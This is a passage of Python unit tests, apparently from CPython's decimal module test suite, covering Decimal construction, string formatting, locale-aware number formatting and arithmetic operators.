quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
        #engineering notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
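        # unicode_legacy_string() builds a string through the legacy
        # Py_UNICODE API; construction from it must behave like a normal str.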
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
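        # Unlike Decimal(float), Context.create_decimal(float) rounds the
        # exact binary value to the context precision (28 digits by default).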
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
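        # Any Unicode decimal digits (fullwidth, Arabic-Indic, Telugu, ...)
        # are accepted wherever ASCII digits are.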
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
        # Allow other classes to be taught to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
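        # Exercise the locale-aware 'n' format using hand-built
        # localeconv-style dictionaries instead of switching real locales.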
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
